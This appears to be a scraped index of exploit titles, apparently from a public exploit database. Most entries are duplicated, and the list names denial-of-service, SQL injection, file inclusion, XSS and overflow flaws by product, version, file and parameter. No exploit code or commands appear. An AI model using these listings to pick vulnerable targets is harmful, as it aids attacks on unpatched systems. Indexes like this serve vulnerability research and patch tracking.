Admin Password Exploit OpenForum 0.66 Beta - Remote Reset Admin Password Exploit Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service Exploit Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local DoS Exploit Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Exploit Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Linksys Wireless ADSL Router (WAG54G v2) - httpd DoS Exploit Linksys Wireless ADSL Router (WAG54G v2) - httpd Denial of Service Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin) PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service Exploit Psi Jabber Client (8010/tcp) Remote Denial of Service (win/lin) PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service VMware 2.5.1 - (Vmware-authd) Remote Denial of Service Exploit VMware 2.5.1 - (Vmware-authd) Remote Denial of Service SeaMonkey 1.1.14 - (marquee) Denial of Service Exploit SeaMonkey 1.1.14 - (marquee) Denial of Service Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Winamp 5.541 - (mp3/aiff) Multiple Denial of Service Exploits Winamp 5.541 - (mp3/aiff) Multiple Denial of Services Cisco VLAN Trunking Protocol Denial of Service Exploit Cisco VLAN Trunking Protocol Denial of Service Novell Netware 6.5 - (ICEbrowser) Remote System DoS Exploit Novell Netware 6.5 - (ICEbrowser) Remote System Denial of Service D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service Exploit D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service TxtBlog 1.0 Alpha Remote Command Execution Exploit TxtBlog 1.0 Alpha - Remote Command Execution Exploit GR Note 0.94 beta (Auth Bypass) Remote Database Backup GR Note 0.94 beta - (Auth Bypass) Remote Database Backup Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service Exploit Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service BlueBird Pre-Release (Auth Bypass) SQL Injection BlueBird Pre-Release - (Auth Bypass) SQL Injection Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Exploit Got All Media 7.0.0.3 - (t00t) Remote Denial of Service HTC Touch vCard over IP Denial of Service Exploit HTC Touch vCard over IP Denial of Service Yaws < 1.80 - (multiple headers) Remote Denial of Service Exploit Yaws < 1.80 - (multiple headers) Remote Denial of Service Multiple Vendors libc:fts_*() - Local Denial of Service Exploit Multiple Vendors libc:fts_*() - Local Denial of Service Addonics NAS Adapter Post-Auth Denial of Service Exploit Addonics NAS Adapter Post-Auth Denial of Service Serv-U 7.4.0.1 - (SMNT) Denial of Service Exploit (post auth) VLC 0.9.8a Web UI (input) Remote Denial of Service Exploit Serv-U 7.4.0.1 - (SMNT) Denial of Service (post auth) VLC 0.9.8a Web UI (input) Remote Denial of Service SW-HTTPD Server 0.x - Remote Denial of Service Exploit SW-HTTPD Server 0.x - Remote Denial of Service XM Easy Personal FTP Server 5.7.0 - (NLST) DoS Exploit XM Easy Personal FTP Server 5.7.0 - (NLST) Denial of Service Sami HTTP Server 2.x - (HEAD) Remote Denial of Service Exploit Sami HTTP Server 2.x - (HEAD) Remote Denial of Service IBM DB2 < 9.5 pack 3a - Connect Denial of Service Exploit IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Exploit IBM DB2 < 9.5 pack 3a - Connect Denial of Service IBM DB2 < 9.5 pack 3a - Data Stream Denial of Service Steamcast 0.9.75b Remote Denial of Service Exploit OpenBSD 4.5 IP datagram Null Pointer Deref DoS Exploit Steamcast 0.9.75b Remote Denial of Service OpenBSD 4.5 IP datagram Null Pointer Deref Denial of Service Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit Microsoft Media Player - (quartz.dll .mid) Denial of Service Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth) Addonics NAS Adapter (bts.cgi) Remote Denial of Service (post-auth) Zervit Web Server 0.3 - Remote Denial of Service Exploit Zervit Web Server 0.3 - Remote Denial of Service Xitami Web Server 5.0 - Remote Denial of Service Exploit Xitami Web Server 5.0 - Remote Denial of Service iodined 0.4.2-2 - (forged DNS packet) Denial of Service Exploit iodined 0.4.2-2 - (forged DNS packet) Denial of Service Addonics NAS Adapter FTP Remote Denial of Service Exploit Addonics NAS Adapter FTP Remote Denial of Service Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service Exploit Mortbay Jetty 7.0.0-pre5 Dispatcher Servlet Denial of Service TYPSoft FTP Server 1.11 - (ABORT) Remote DoS Exploit TYPSoft FTP Server 1.11 - (ABORT) Remote Denial of Service Mereo 1.8.0 - (Get Request) Remote Denial of Service Exploit Mereo 1.8.0 - (Get Request) Remote Denial of Service DGNews 3.0 Beta (id) SQL Injection DGNews 3.0 Beta - (id) SQL Injection Mozilla Firefox (unclamped loop) Denial of Service Exploit Mozilla Firefox (unclamped loop) Denial of Service Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Exploit Mozilla Firefox 3.0.10 - (KEYGEN) Remote Denial of Service Apache mod_dav / svn Remote Denial of Service Exploit Apache mod_dav / svn Remote Denial of Service OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote Denial of Service LinkLogger 2.4.10.15 - (syslog) Denial of Service Exploit LinkLogger 2.4.10.15 - (syslog) Denial of Service ARD-9808 DVR Card Security Camera (GET Request) Remote DoS Exploit ARD-9808 DVR Card Security Camera (GET Request) Remote Denial of Service FreeBSD 6/8 - (ata device) Local Denial of Service Exploit FreeBSD 6/8 - (ata device) Local Denial of Service Multiple Web Browsers Denial of Service Exploit (1 bug to rule them all) Multiple Web Browsers Denial of Service (1 bug to rule them all) FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit FreeBSD 7.2 - (pecoff executable) Local Denial of Service E-Xoopport 3.1 Module MyAnnonces (lid) SQL Injection E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection OpenH323 Opal SIP Protocol Remote Denial of Service Exploit Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit WzdFTPD 8.0 - Remote Denial of Service Exploit OpenH323 Opal SIP Protocol Remote Denial of Service Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service WzdFTPD 8.0 - Remote Denial of Service FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit TheGreenBow VPN Client tgbvpn.sys Local Denial of Service HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service KSP 2006 FINAL (.M3U) Universal Local Buffer Exploit (SEH) KSP 2006 FINAL - (.M3U) Universal Local Buffer Exploit (SEH) Xerox WorkCentre Multiple Models Denial of Service Exploit Cerberus FTP 3.0.1 - (ALLO) Remote Overflow DoS Exploit (Metasploit) Xerox WorkCentre Multiple Models Denial of Service Cerberus FTP 3.0.1 - (ALLO) Remote Overflow Denial of Service (Metasploit) TFTPUtil GUI 1.3.0 - Remote Denial of Service Exploit TFTPUtil GUI 1.3.0 - Remote Denial of Service SolarWinds TFTP Server 9.2.0.111 - Remote DoS Exploit SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service Re-Script 0.99 Beta (listings.php op) SQL Injection Re-Script 0.99 Beta - (listings.php op) SQL Injection Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit Novell eDirectory 8.8 SP5 - Remote Denial of Service Safari 3.2.3 - (Win32) JavaScript (eval) Remote DoS Exploit Safari 3.2.3 - (Win32) JavaScript (eval) Remote Denial of Service WarFTPd 1.82.00-RC12 - (LIST command) Format String DoS Exploit WarFTPd 1.82.00-RC12 - (LIST command) Format String Denial of Service FreeRadius < 1.1.8 - Zero-length Tunnel-Password DoS Exploit FreeRadius < 1.1.8 - Zero-length Tunnel-Password Denial of Service httpdx Web Server 1.4 - (Host Header) Remote Format String DoS Exploit httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service FtpXQ FTP Server 3.0 - Remote Denial of Service Exploit (Auth) FtpXQ FTP Server 3.0 - Remote Denial of Service (Auth) Cerberus FTP Server 3.0.3 - Remote Denial of Service Exploit Cerberus FTP Server 3.0.3 - Remote Denial of Service FTPDMIN 0.96 - (LIST) Remote Denial of Service Exploit FTPDMIN 0.96 - (LIST) Remote Denial of Service Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit Safari 4.0.3 - (Win32) CSS Remote Denial of Service PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python) PHP < 5.3.1 - 'multipart/form-data' Denial of Service (Python) Drupal Sections Module XSS Drupal Sections Module - XSS 3Com OfficeConnect Routers - Remote DoS Exploit 3Com OfficeConnect Routers - Remote Denial of Service TFTP Daemon 1.9 - Denial of Service Exploit TFTP Daemon 1.9 - Denial of Service SimplePlayer 0.2 - (.wav) Overflow DoS Exploit (0Day) SimplePlayer 0.2 - (.wav) Overflow Denial of Service (0Day) Joomla Component com_abbrev Local File Inclusion Joomla Component com_abbrev - Local File Inclusion iOS Udisk FTP Basic Edition - Remote DoS Exploit (0Day) iOS Udisk FTP Basic Edition - Remote Denial of Service (0Day) P2GChinchilla HTTP Server 1.1.1 - Denial of Service Exploit P2GChinchilla HTTP Server 1.1.1 - Denial of Service iOS Serversman 3.1.5 - HTTP Remote DoS Exploit iOS Serversman 3.1.5 - HTTP Remote Denial of Service Opera 10.10 - Remote Code Execution DoS Exploit Opera 10.10 - Remote Code Execution Denial of Service Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service Exploit Mozilla Firefox 3.6 - (Multitudinous looping) Denial of Service Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service Exploit Microsoft Internet Explorer 8 - (Multitudinous looping) Denial of Service iOS My DBLite Edition - Remote DoS Exploit (0Day) iOS My DBLite Edition - Remote Denial of Service (0Day) iOS FileApp 1.7 - Remote DoS Exploit iOS FileApp 1.7 - Remote Denial of Service iOS iFTPStorage 1.2 - Remote DoS Exploit iOS iFTPStorage 1.2 - Remote Denial of Service Winamp 5.57 - (Browser) IE Denial of Service Exploit Winamp 5.57 - (Browser) IE Denial of Service VKPlayer 1.0 - (.mid) Denial of Service Exploit VKPlayer 1.0 - (.mid) Denial of Service iPhone FTP Server By Zhang Boyang Remote DoS Exploit iPhone FTP Server By Zhang Boyang Remote Denial of Service Mozilla Firefox 3.6 - Denial of Service Exploit Mozilla Firefox 3.6 - Denial of Service Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote Include Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusion PowieSys 0.7.7 alpha index.php (shownews) SQL Injection PowieSys 0.7.7 alpha - index.php (shownews) SQL Injection BitComet 1.19 - Remote DoS Exploit BitComet 1.19 - Remote Denial of Service ALPHA CMS Local File Inclusion ALPHA CMS - Local File Inclusion uTorrent WebUI 0.370 - Authorization header DoS Exploit uTorrent WebUI 0.370 - Authorization header Denial of Service Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit Foxit Reader 3.2.1.0401 - Denial of Service Exploit Microsoft Office (2010 beta) Communicator SIP Denial of Service Foxit Reader 3.2.1.0401 - Denial of Service Joomla Component JTM Reseller 1.9 Beta SQL Injection Joomla Component JTM Reseller 1.9 Beta - SQL Injection EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote DoS Exploit (IE) EDraw Flowchart ActiveX Control 2.3 - (EDImage.ocx) Remote Denial of Service (IE) Webmoney Advisor ActiveX Remote DoS Exploit Webmoney Advisor ActiveX Remote Denial of Service Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Exploit Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service Press Release Script (page.php id) SQL Injection Press Release Script - (page.php id) SQL Injection dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion HomeFTP Server r1.10.3 - (build 144) Denial of Service Exploit HomeFTP Server r1.10.3 - (build 144) Denial of Service Solarwinds 10.4.0.13 - Denial of Service Exploit Solarwinds 10.4.0.13 - Denial of Service EZPX Photoblog 1.2 beta Remote File Inclusion Exploit EZPX Photoblog 1.2 beta - Remote File Inclusion Exploit Drupal Sections 5.x-1.2/6.x-1.2 Module HTML Injection Drupal Sections 5.x-1.2/6.x-1.2 Module - HTML Injection MP3 Cutter 1.5 - DoS Exploit MP3 Cutter 1.5 - Denial of Service Really Simple IM 1.3beta DoS Proof of Concept Really Simple IM 1.3beta - DoS Proof of Concept QQ Computer Manager TSKsp.sys Local Denial of Service Exploit QQ Computer Manager TSKsp.sys Local Denial of Service SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) DoS Exploit SmartCode ServerX VNC Server ActiveX 1.1.5.0 - (scvncsrvx.dll) Denial of Service VMware Workstation 7.1.1 - VMkbd.sys Denial of Service Exploit VMware Workstation 7.1.1 - VMkbd.sys Denial of Service iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit iOS FileApp < 2.0 - FTP Remote Denial of Service AVG Internet Security 9.0.851 - Local Denial of Service Exploit AVG Internet Security 9.0.851 - Local Denial of Service GSPlayer 1.83a Win32 Release Buffer Overflow GSPlayer 1.83a Win32 Release - Buffer Overflow Sami HTTP Server 2.0.1 - GET Request Denial of Service Exploit Sami HTTP Server 2.0.1 - GET Request Denial of Service PCSX2 0.9.7 beta Binary Denial of Service PCSX2 0.9.7 beta - Binary Denial of Service HttpBlitz Web Server Denial of Service Exploit HttpBlitz Web Server Denial of Service Xynph 1.0 USER Denial of Service Exploit Xynph 1.0 USER Denial of Service Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode DoS Exploit Kingsoft AntiVirus 2011 SP5.2 KisKrnl.sys 2011.1.13.89 - Local Kernel Mode Denial of Service Solar FTP 2.1 - Denial of Service Exploit Solar FTP 2.1 - Denial of Service Victory FTP Server 5.0 - Denial of Service Exploit Victory FTP Server 5.0 - Denial of Service TWiki History TWikiUsers rev Parameter Command Execution TWiki History TWikiUsers - rev Parameter Command Execution AVIPreview 0.26 Alpha Denial of Service AVIPreview 0.26 Alpha - Denial of Service Microsoft Windows XP - afd.sys Local Kernel DoS Exploit Microsoft Windows XP - afd.sys Local Kernel Denial of Service Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel DoS Exploit Microsoft Windows Vista/Server 2008 - 'nsiproxy.sys' Local Kernel Denial of Service Adobe Reader/Acrobat 10.0.1 DoS Exploit Adobe Reader/Acrobat 10.0.1 Denial of Service Omnicom Alpha 4.0e LPD Server DoS Omnicom Alpha 4.0e LPD Server - DoS OpenSLP 1.2.1 / < 1647 trunk - Denial of Service Exploit OpenSLP 1.2.1 / < 1647 trunk - Denial of Service World Of Warcraft Local Stack Overflow DoS Exploit (chat-cache.txt) World Of Warcraft Local Stack Overflow Denial of Service (chat-cache.txt) TOWeb 3.0 - Local Format String DoS Exploit (TOWeb.MO file corruption) TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file corruption) 1024 CMS 1.1.0 Beta force_download.php Local File Inclusion 1024 CMS 1.1.0 Beta - force_download.php Local File Inclusion FleaHttpd Remote Denial of Service Exploit FleaHttpd Remote Denial of Service ComSndFTP Server 1.3.7 Beta Remote Format String Overflow ComSndFTP Server 1.3.7 Beta - Remote Format String Overflow Play [EX] 2.1 - Playlist File (M3U/PLS/LST) DoS Exploit Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service Windows OpenType Font - File Format DoS Exploit Windows OpenType Font - File Format Denial of Service HP JetAdmin 1.0.9 Rev. D symlink HP JetAdmin 1.0.9 Rev. D - symlink Microsoft Site Server Commerce Edition 3.0 alpha AdSamples Microsoft Site Server Commerce Edition 3.0 alpha - AdSamples Sensitive Information Daniel Beckham The Finger Server 0.82 BETA Pipe Daniel Beckham The Finger Server 0.82 BETA - Pipe Sambar Server 4.2 beta 7 Batch CGI Sambar Server 4.2 beta 7 - Batch CGI DomsHttpd 1.0 - Remote Denial of Service Exploit DomsHttpd 1.0 - Remote Denial of Service Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (1) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (2) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta Mail Logging Buffer Overflow (3) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (1) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (2) Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 beta - Mail Logging Buffer Overflow (3) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode (1) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha DNS Decode (2) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha - DNS Decode (1) Ethereal 0.8.4/0.8.5/0.8.6_tcpdump 3.4/3.5 alpha - DNS Decode (2) Real Networks Real Server 7.0/7.0.1/8.0 Beta View-Source DoS Real Networks Real Server 7.0/7.0.1/8.0 Beta - View-Source DoS Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Omnicron OmniHTTPD 1.1/2.0 Alpha 1 - visiadmin.exe Denial of Service Sun Java Web Server 1.1 Beta Viewable .jhtml Source Sun Java Web Server 1.1 Beta - Viewable .jhtml Source HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A - LCD Display Modification Sambar Server 4.1 beta Admin Access Sambar Server 4.1 beta - Admin Access Alpha Networks ADSL2/2+ Wireless Router ASL-26555 Password Disclosure Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure Cisco IOS 12 UDP Denial of Service Cisco IOS 12 - UDP Denial of Service XMB Forum 1.6 pre-beta Image Tag Script Injection XMB Forum 1.6 pre-beta - Image Tag Script Injection DCShop Beta 1.0 Form Manipulation DCShop Beta 1.0 - Form Manipulation Cisco IOS 11.x/12.0 ICMP Redirect Denial of Service Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service SmartMail Server 1.0 BETA 10 Oversized Request Denial of Service SmartMail Server 1.0 BETA 10 - Oversized Request Denial of Service Ultimate PHP Board 1.0 final beta ViewTopic.php Directory Contents Browsing Ultimate PHP Board Board 1.0 final beta ViewTopic.php Cross-Site Scripting Ultimate PHP Board 1.0 final beta - ViewTopic.php Directory Contents Browsing Ultimate PHP Board Board 1.0 final beta - ViewTopic.php Cross-Site Scripting N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI N/X Web Content Management System 2002 Prerelease 1 - datasets.php c_path Parameter LFI PHPOutsourcing Zorum 3.x - Remote Include Command Execution PHPOutsourcing Zorum 3.x - Remote File Inclusion Command Execution Sage 1.0 beta 3 Content Management System Path Disclosure Sage 1.0 beta 3 Content Management System Cross-Site Scripting Sage 1.0 beta 3 - Content Management System Path Disclosure Sage 1.0 beta 3 - Content Management System Cross-Site Scripting E-theni Remote Include Command Execution E-theni Remote File Inclusion Command Execution BZFlag 1.7 g0 Reconnect Denial of Service BZFlag 1.7 g0 - Reconnect Denial of Service Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module Integer Overflow Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow PMachine 2.2.1 Lib.Inc.php Remote Include Command Execution PMachine 2.2.1 Lib.Inc.php Remote File Inclusion Command Execution PHPForum 2.0 RC1 Mainfile.php Remote File Inclusion PHPForum 2.0 RC1 - Mainfile.php Remote File Inclusion IdealBB 1.4.9 Beta HTML Injection IdealBB 1.4.9 Beta - HTML Injection Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Cross-Site Scripting Escapade 0.2.1 Beta Scripting Engine PAGE Parameter Path Disclosure Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Path Disclosure Koch Roland Rolis Guestbook 1.0 $path Remote File Inclusion Koch Roland Rolis Guestbook 1.0 - $path Remote File Inclusion My_EGallery Module 3.1.1 - Remote Include Command Injection My_EGallery Module 3.1.1 - Remote File Inclusion Command Injection Apache 2.0.4x mod_php Module File Descriptor Leakage (1) Apache 2.0.4x mod_php Module File Descriptor Leakage (2) Apache 2.0.4x mod_php Module - File Descriptor Leakage (1) Apache 2.0.4x mod_php Module - File Descriptor Leakage (2) Apache 2.0.4x mod_perl Module File Descriptor Leakage Apache 2.0.4x mod_perl Module - File Descriptor Leakage Laurent Adda Les Commentaires 2.0 PHP Script fonctions.lib.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 PHP Script derniers_commentaires.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 PHP Script admin.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script fonctions.lib.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script derniers_commentaires.php Remote File Inclusion Laurent Adda Les Commentaires 2.0 - PHP Script admin.php Remote File Inclusion NewsTraXor Website Management Script 2.9 beta Database Disclosure NewsTraXor Website Management Script 2.9 beta - Database Disclosure Adam Webb NukeJokes 1.7/2.0 Module modules.php jokeid Parameter SQL Injection Adam Webb NukeJokes 1.7/2.0 Module - modules.php jokeid Parameter SQL Injection PHP 4/5 Input/Output Wrapper Remote Include Function Command Execution Weakness PHP 4/5 Input/Output Wrapper Remote File Inclusion Function Command Execution Weakness Sambar Server 6.1 beta 2 show.asp show Parameter XSS Sambar Server 6.1 beta 2 showperf.asp title Parameter XSS Sambar Server 6.1 beta 2 showini.asp Arbitrary File Access Sambar Server 6.1 beta 2 - show.asp show Parameter XSS Sambar Server 6.1 beta 2 - showperf.asp title Parameter XSS Sambar Server 6.1 beta 2 - showini.asp Arbitrary File Access EasyWeb 1.0 FileManager Module Directory Traversal EasyWeb 1.0 FileManager Module - Directory Traversal EasyIns Stadtportal 4.0 Site Parameter Remote File Inclusion EasyIns Stadtportal 4.0 - Site Parameter Remote File Inclusion Free Web Chat Initial Release UserManager.java Null Pointer DoS Free Web Chat Initial Release Connection Saturation DoS Free Web Chat Initial Release - UserManager.java Null Pointer DoS Free Web Chat Initial Release - Connection Saturation DoS Cerulean Studios Trillian Client 0.74 MSN Module Remote Buffer Overflow Cerulean Studios Trillian Client 0.74 MSN Module - Remote Buffer Overflow TP-Link TL-WR740N Wireless Router - Denial of Service Exploit TP-Link TL-WR740N Wireless Router - Denial of Service Singapore 0.9.11 beta Image Gallery Index.php Cross-Site Scripting Singapore 0.9.11 beta Image Gallery - Index.php Cross-Site Scripting Datenbank Module For PHPBB Remote Mod.php Cross-Site Scripting Datenbank Module For PHPBB - Remote Mod.php Cross-Site Scripting Convert-UUlib 1.04/1.05 Perl Module Buffer Overflow Convert-UUlib 1.04/1.05 Perl Module - Buffer Overflow Atomic Photo Album 0.x/1.0 Apa_PHPInclude.INC.php Remote File Inclusion Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion Comdev ECommerce 3.0 Config.php Remote File Inclusion Comdev ECommerce 3.0 - Config.php Remote File Inclusion PHPTB Topic Board 2.0 admin_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 board_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 dev_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 file_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 tech_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - admin_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - board_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - dev_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion PHPWebNotes 2.0 Api.php Remote File Inclusion PHPWebNotes 2.0 - Api.php Remote File Inclusion CMS Made Simple 0.10 Lang.php Remote File Inclusion CMS Made Simple 0.10 - Lang.php Remote File Inclusion MusicBee 2.0.4663 - (.m3u) Denial of Service Exploit MusicBee 2.0.4663 - (.m3u) Denial of Service Help Center Live 1.0/1.2/2.0 Module.php Local File Inclusion Help Center Live 1.0/1.2/2.0 - Module.php Local File Inclusion Edgewall Software Trac 0.9 Ticket Query Module SQL Injection Edgewall Software Trac 0.9 Ticket Query Module - SQL Injection Thwboard Beta 2.8 calendar.php year Parameter SQL Injection Thwboard Beta 2.8 v_profile.php user Parameter SQL Injection Thwboard Beta 2.8 misc.php userid Parameter SQL Injection Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection Bitweaver 1.1.1 beta list_galleries.php sort_mode Parameter XSS Bitweaver 1.1.1 beta - list_galleries.php sort_mode Parameter XSS OABoard 1.0 Forum Script Remote File Inclusion OABoard 1.0 Forum - Script Remote File Inclusion InTouch 0.5.1 Alpha User Variable SQL Injection InTouch 0.5.1 Alpha - User Variable SQL Injection LinPHA 0.9.x/1.0 install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 sec_stage_install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 forth_stage_install.php language Variable POST Method Local File Inclusion LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion Dotproject 2.0 /includes/db_connect.php baseDir Remote File Inclusion Dotproject 2.0 /includes/session.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion Dotproject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/public/calendar.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/public/date_format.php baseDir Parameter Remote File Inclusion Dotproject 2.0 /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion Dotproject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion Web Host Automation Ltd. Helm 3.2.10 beta domains.asp txtDomainName Parameter XSS Web Host Automation Ltd. Helm 3.2.10 beta default.asp Multiple Parameter XSS Web Host Automation Ltd. Helm 3.2.10 beta - domains.asp txtDomainName Parameter XSS Web Host Automation Ltd. Helm 3.2.10 beta - default.asp Multiple Parameter XSS CutePHP CuteNews 1.4.1 Editnews Module Cross-Site Scripting CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting RadScripts RadLance 7.0 Popup.php Local File Inclusion RadScripts RadLance 7.0 - Popup.php Local File Inclusion dotWidget for articles 2.0 showcatpicks.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 showarticle.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 admin/authors.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/index.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - showcatpicks.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 - showarticle.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/authors.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/articles.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/index.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/categories.php Multiple Parameter Remote File Inclusion CrisoftRicette 1.0 Cookbook.php Remote File Inclusion CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion MF Piadas 1.0 Admin.php Remote File Inclusion MF Piadas 1.0 - Admin.php Remote File Inclusion ExtCalendar 2.0 ExtCalendar.php Remote File Inclusion ExtCalendar 2.0 - ExtCalendar.php Remote File Inclusion Calendar Module 1.5.7 For Mambo Com_Calendar.php Remote File Inclusion Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion Lussumo Vanilla 1.0 RootDirectory Remote File Inclusion Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion Bosdates 3.x/4.0 Payment.php Remote File Inclusion Bosdates 3.x/4.0 - Payment.php Remote File Inclusion Liga Manager Online 2.0 Joomla! Component Remote File Inclusion Liga Manager Online 2.0 Joomla! Component - Remote File Inclusion Knusperleicht FAQ 1.0 Script Index.php Remote File Inclusion Knusperleicht FAQ 1.0 Script - Index.php Remote File Inclusion MyWebland miniBloggie 1.0 Fname Remote File Inclusion MyWebland miniBloggie 1.0 - Fname Remote File Inclusion PHP-Nuke 2.0 